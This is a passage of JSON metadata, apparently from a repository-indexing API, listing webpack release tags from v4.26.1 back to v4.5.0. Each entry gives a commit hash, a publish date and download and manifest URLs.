v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webp